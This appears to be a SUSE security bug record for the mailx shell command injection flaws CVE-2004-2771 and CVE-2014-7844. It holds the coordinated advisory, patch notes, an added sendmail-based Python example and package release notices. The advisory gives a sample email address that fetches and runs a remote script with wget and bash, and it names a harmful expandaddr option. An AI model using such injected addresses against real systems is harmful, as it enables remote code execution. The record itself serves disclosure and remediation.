Bug 909208 (CVE-2004-2771) - VUL-0: CVE-2004-2771, CVE-2014-7844: mailx: shell command injection via crafted email addresses
Summary: VUL-0: CVE-2004-2771, CVE-2014-7844: mailx: shell command injection via craft...
Status: RESOLVED FIXED
Alias: CVE-2004-2771
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Deadline: 2014-12-25
Assignee: Security Team bot
QA Contact: Security Team bot
URL:
Whiteboard: CVSSv3.1:SUSE:CVE-2014-7844:7.8:(AV:L...
Keywords:
Depends on:
Blocks:
 
Reported: 2014-12-10 09:29 UTC by Alexander Bergmann
Modified: 2021-01-19 12:48 UTC
5 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Description Alexander Bergmann 2014-12-10 09:29:14 UTC
CDR: 2014-12-16, 1200 UTC


It turns out that various versions of mailx have shell command injection 
via crafted email addresses.  These issues are different from the 
POSIX-mandated shell escape in email bodies (“~!”), which most 
implementations switch off when the input is not a terminal.

There are two main branches of mailx these days, Heirloom mailx and BSD 
mailx.

Heirloom mailx is defunct upstream and has been superseded by nail 
(according to the nail author, so take that with a grain of salt).  I 
have not been able to contact the Heirloom mailx upstream.  (In 
practice, the successor for anything but script use is probably mutt, at 
least in GNU/Linux land.)

For BSD mailx, OpenBSD seems the canonical source these days.  I 
discussed these issues with Todd Miller (Cc:ed), who kindly provided 
patches for their version.

*** Heirloom mailx ***

For Heirloom mailx, the numbered patches address the following issues:

0001. Do not recognize paths, mail folders, and pipes in mail addresses 
by default.  That avoids a direct command injection with syntactically 
valid email addresses such as:

    |wget${IFS}ftp.example.com/a&&bash${IFS}a&&@example.com

Such addresses can be specified both on the command line, the mail 
headers (with “-t”) or in address lines copied over from previous mail 
while replying.

This was assigned CVE-2014-7844 for some versions of BSD mailx.  It is 
documented behavior for Heirloom mailx, and was mentioned in an old 
technical report about BSD mailx (which does not usually make its way 
into operating system installations).  The patch switches off this 
processing and updates the documentation.

0002. When invoking sendmail, prevent option processing for email 
address arguments.  This prevents changing e.g. the Postfix 
configuration file in unexpected ways.  This behavior was documented for 
BSD mailx (sort of), but not for Heirloom mailx.  We did not assign a 
CVE to this because it is more of a missing feature, and code invoking 
mailx needs adjustment in the caller as well.

0003. Make wordexp support mandatory.  (No functional change.)

0004. Prevent command execution in the expand function, which is IMHO 
unexpected.  (Not really required with patch 1, and there is still 
information disclosure/DoS potential if this expansion occurs.)  This is 
a historic vulnerability already fixed in the Debian package, 
retroactively assigned CVE-2004-2771:

   <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=278748>

(The Heirloom patch is slightly different because of the existing use of 
wordexp.)

*** BSD mailx ***

The unnumbered patches are for BSD mailx.  Their order is: remove_T, 
minus_f, mail_glob, expandaddr, nosendmail.  remove_T and minus_f have 
already been committed.  The remaining three roughly correspond to my 
patches 0003+0004, 0001, and 0002.

The previous BSD mailx code seems to have an implicit dependency of a 
non-option-reordering getopt.  (BSD getopt does not recognize options 
after non-option arguments, GNU getopt does.)  I think the minus_f patch 
only improves matters in this regard.

*** Coordinated release date ***

Coordinated release date is 2014-12-16, 1200 UTC.

*** Fixing applications ***

Applications calling mailx with untrusted addresses which can start with 
“-” still need updating to use “--”.  This is sadly not compatible with 
older mailx versions lacking the equivalent of patch 0002.  However, 
directly calling “/usr/sbin/sendmail -i -t” with a self-constructed 
email header will work on almost all systems.

Option processing is risky for two reasons: Some of the options are 
plainly harmful (e.g., “-Sexpandaddr=@example.com”).  Others can be used 
to mask email addresses, which means that mailx enters read mode, where 
you can run shells using the “!” escape (which is especially problematic 
if mailx is used to send mail with partially attacker-controlled content).

For Heirloom mailx, I tried to work around this, but both Sebastian 
Krahmer and Todd Miller helpfully pointed out that I missed some 
options, and that the whole approach is unlikely to work, ever.

I already ported one application over to sendmail, and it wasn't too 
hard, so I think this is the proper way forward.

*** Further communications ***

Please keep Todd and me Cc: on subsequent messages because we are not 
subscribed to the distros list.

-- 
Florian Weimer / Red Hat Product Security
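The sendmail-based replacement recommended under "Fixing applications" above, as an added example that is not part of the advisory or of any mailx code: a Python helper that refuses recipient strings which could be read as options ("-...") or as expandaddr targets ("|cmd", "/path", shell metacharacters), builds its own header, and hands the message to `/usr/sbin/sendmail -i -t` on stdin without a shell. The sendmail path, the function names and the conservative address allow-list are assumptions of this example.

```python
import re
import subprocess
from email.message import EmailMessage

# Assumed sendmail location (as named in the advisory); adjust per system.
SENDMAIL = "/usr/sbin/sendmail"

# Conservative allow-list for one bare addr-spec (local-part@domain).
# Deliberately excludes display names, commas, "|", "/", "$", "&", "{"
# and similar characters, so expandaddr-style pipe/file/command forms
# such as "|wget${IFS}.../a&&@example.com" cannot get through.
_ADDR_RE = re.compile(r"[A-Za-z0-9._%+=]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_safe_address(addr):
    """True only for a plain addr-spec that cannot be parsed as an option."""
    return not addr.startswith("-") and _ADDR_RE.fullmatch(addr) is not None


def check_address(addr):
    """Return addr unchanged, or raise ValueError for anything suspicious."""
    if not is_safe_address(addr):
        raise ValueError("refusing suspicious address: %r" % addr)
    return addr


def build_sendmail_call(sender, recipients, subject, body):
    """Construct (argv, message_bytes) for a self-built header fed to sendmail."""
    check_address(sender)
    to = [check_address(a) for a in recipients]
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = ", ".join(to)
    # Strip CR/LF from caller-supplied subject so no extra header can be injected.
    msg["Subject"] = subject.replace("\r", " ").replace("\n", " ")
    msg.set_content(body)
    # -i: a line with a lone "." does not end the message
    # -t: recipients come from the To:/Cc:/Bcc: headers we built ourselves
    argv = [SENDMAIL, "-i", "-t"]
    return argv, msg.as_bytes()


def send(sender, recipients, subject, body):
    """Deliver via sendmail; argv is a list, so no shell ever sees the addresses."""
    argv, data = build_sendmail_call(sender, recipients, subject, body)
    subprocess.run(argv, input=data, check=True)
```

Addresses are passed only inside the message header, never as command-line arguments, so the "--" compatibility problem the advisory describes does not arise.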
Comment 1 Alexander Bergmann 2014-12-10 09:31:08 UTC
Created attachment 616516 [details]
bugfix tar archive
Comment 2 Swamp Workflow Management 2014-12-10 23:00:16 UTC
bugbot adjusting priority
Comment 4 Dr. Werner Fink 2014-12-11 12:41:39 UTC
I've fixed all maintained packages[1]. As this is currently embargoed, I'd like to know how to handle the openSUSE packages?

[1]
mailx/Updates> foreach d (openSUSE_1* SLE-1*)
foreach? pushd $d
foreach? osc st
foreach? popd
foreach? end
/usr/src/werner/mailx/Updates/openSUSE_12.3 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx-12.5.dif
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates 
/usr/src/werner/mailx/Updates/openSUSE_13.1 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx-12.5.dif
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates 
/usr/src/werner/mailx/Updates/openSUSE_13.2 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx-12.5.dif
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates 
/usr/src/werner/mailx/Updates/SLE-10-SP2 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates 
/usr/src/werner/mailx/Updates/SLE-11 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates 
/usr/src/werner/mailx/Updates/SLE-12 /usr/src/werner/mailx/Updates 
A    0001-outof-Introduce-expandaddr-flag.patch
A    0002-unpack-Disable-option-processing-for-email-addresses.patch
A    0003-fio.c-Unconditionally-require-wordexp-support.patch
A    0004-globname-Invoke-wordexp-with-WRDE_NOCMD-CVE-2004-277.patch
M    mailx-12.5.dif
M    mailx.changes
M    mailx.spec
M    nail-11.25-path.dif
/usr/src/werner/mailx/Updates
Comment 5 Alexander Bergmann 2014-12-11 12:55:14 UTC
> I've fixed all maintained packages[1], as this currently embargoed, I'd like
> to know how to handle the openSUSE packages?

You can prepare the submissions locally and submit to openSUSE after this issue went public. The security team will update this bug report and remove the embargo as soon as this got disclosed.
Comment 6 Swamp Workflow Management 2014-12-11 14:05:54 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2014-12-25.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/60009
Comment 10 Johannes Segitz 2014-12-17 08:50:30 UTC
public
Comment 11 Dr. Werner Fink 2014-12-17 12:34:46 UTC
(In reply to Johannes Segitz from comment #10)

Submitted to openSUSE 12.3, 13.1, 13.2, and Factory
Comment 12 Bernhard Wiedemann 2014-12-17 13:00:07 UTC
This is an autogenerated message for OBS integration:
This bug (909208) was mentioned in
https://build.opensuse.org/request/show/265558 12.3 / mailx
https://build.opensuse.org/request/show/265559 13.1 / mailx
https://build.opensuse.org/request/show/265560 13.2 / mailx
https://build.opensuse.org/request/show/265561 Factory / mailx
Comment 13 Swamp Workflow Management 2014-12-18 09:04:53 UTC
SUSE-SU-2014:1658-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 909208
CVE References: CVE-2004-2771,CVE-2014-7844
Sources used:
SUSE Linux Enterprise Server 12 (src):    mailx-12.5-22.1
SUSE Linux Enterprise Desktop 12 (src):    mailx-12.5-22.1
Comment 14 Swamp Workflow Management 2014-12-24 07:04:53 UTC
SUSE-SU-2014:1696-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 909208
CVE References: CVE-2004-2771,CVE-2014-7844
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    mailx-12.5-1.7.1
SUSE Linux Enterprise Server 11 SP3 (src):    mailx-12.5-1.7.1
SUSE Linux Enterprise Desktop 11 SP3 (src):    mailx-12.5-1.7.1
Comment 15 Swamp Workflow Management 2014-12-27 20:05:28 UTC
openSUSE-SU-2014:1713-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 909208
CVE References: CVE-2004-2771,CVE-2014-7844
Sources used:
openSUSE 13.2 (src):    mailx-12.5-20.4.1
openSUSE 13.1 (src):    mailx-12.5-14.4.1
openSUSE 12.3 (src):    mailx-12.5-9.4.1
Comment 16 Marcus Meissner 2015-01-26 11:38:17 UTC
was released